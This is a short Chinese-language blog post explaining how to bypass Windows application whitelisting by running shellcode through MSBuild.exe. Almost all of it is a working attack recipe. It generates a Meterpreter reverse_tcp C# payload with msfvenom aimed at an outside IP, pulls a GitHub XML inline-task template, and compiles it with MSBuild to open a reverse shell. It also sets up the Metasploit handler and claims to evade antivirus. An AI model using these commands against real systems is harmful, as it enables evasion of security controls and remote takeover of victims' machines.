MSBuild.exe-bypass application whitelisting

Posted on | In

1)通过msfvenom生成C#的shellcode

1
msfvenom -p windows/meterpreter/reverse_tcp lhost=111.111.111.111 lport=4443 -f csharp

2)下载executes%20shellcode.xml,将上面生成的shellcode复制到该XML文件中

1
https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20shellcode.xml

注意:从C#shellcode中替换shellcode值,然后将msfvenom 生成的shellcode中的buf重命名为shellcode

3)MSBuild.exe编译上面xml文件,执行shellcode 反弹shell

或者将上面xml文件后缀修改为.csproj (C#项目文件的扩展名) ,然后MSBuild.exe编译,同样可以执行shellcode 反弹shell

1
2
3
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe D:\test\mstest.xml
或者
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  D:\test\mstest.csproj


或者

成功bypass av,反弹shell:

补充:MSF开启监听

1
2
3
4
5
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.0.19
set LPORT 4443
exploit -j

参考:
https://www.hackingarticles.in/bypass-application-whitelisting-using-msbuild-exe-multiple-methods/